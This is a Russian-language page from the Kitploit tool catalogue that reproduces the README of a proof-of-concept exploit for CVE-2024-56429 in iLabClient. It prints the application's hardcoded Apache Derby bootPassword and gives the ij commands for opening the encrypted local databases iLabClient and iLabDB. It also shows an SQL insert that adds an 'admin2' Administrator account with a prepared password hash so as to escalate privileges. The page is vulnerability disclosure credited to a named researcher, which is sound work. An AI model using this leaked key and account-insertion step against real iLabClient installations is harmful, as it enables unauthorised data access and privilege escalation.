Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-56429 — Эксплойт для CVE-2024-56429, демонстрирующий извлечение пароля загрузки базы данных Apache Derby из исходного кода iLabClient, что позволяет подключиться к локальной базе данных и повысить привилегии через манипуляцию пользователями. | Kitploit
Инструменты/GitHubGitHub/lisa-2905/cve-2024-56429
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияБезопасность Баз Данных
GitHublisa-2905/cve-2024-56429

CVE-2024-56429

Эксплойт для CVE-2024-56429, демонстрирующий извлечение пароля загрузки базы данных Apache Derby из исходного кода iLabClient, что позволяет подключиться к локальной базе данных и повысить привилегии через манипуляцию пользователями.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-56429

Доступ к локальной базе данных iLabClient


Извлечение пароля базы данных

iLabClient использует базу данных Apache Derby для хранения локально необходимых данных. Для обеспечения шифрования при создании используется bootPassword, который можно извлечь из исходного кода (извлеченный код находится в DecyptedBootPassword.java). После выполнения извлеченного исходного кода пользователь получает bootPassword.

root@kitploit:~
jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==

Подключение к базе данных

При первом запуске iLabClient создаются две локальные базы данных iLabCLient и iLabDB. Для подключения к этим базам данных можно использовать инструмент ij из Apache Derby, Скачать.

Запуск ij:

root@kitploit:~
"C:\ilabClient\java8u422\bin\java.exe" -jar "...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" ij

"C:\ilabClient\java8u422\bin\java.exe": Установленная и используемая версия Java из iLabClient
"...\db-derby-10.14.2.0-lib\lib\derbyrun.jar": Библиотека Apache Derby

Подключение к базе данных:

root@kitploit:~
cd "C:\ilabClient\db
connect 'jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
connect 'jdbc:derby:iLabDB;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';

Манипуляция данными (пример)

После установки соединения данные можно читать и изменять. Например, добавив другого пользователя с большими правами.

root@kitploit:~
 insert into users (USERID, BENUTZER, NAME, PARAMS, HASH) values (4, 'admin2', 'Administrator', '111111111111111111', 'SHA-256:B6382EC801B1BBD5C464C6A5F9C8CFFDC603A7D3A4916B1F50BD592678E8380B');

Необходимый хэш можно создать с помощью класса GenerateUserData.java.


Обнаружитель: Лиза Ульбрих (Lufthansa Industry Solutions AS GmbH)

Скачать инструмент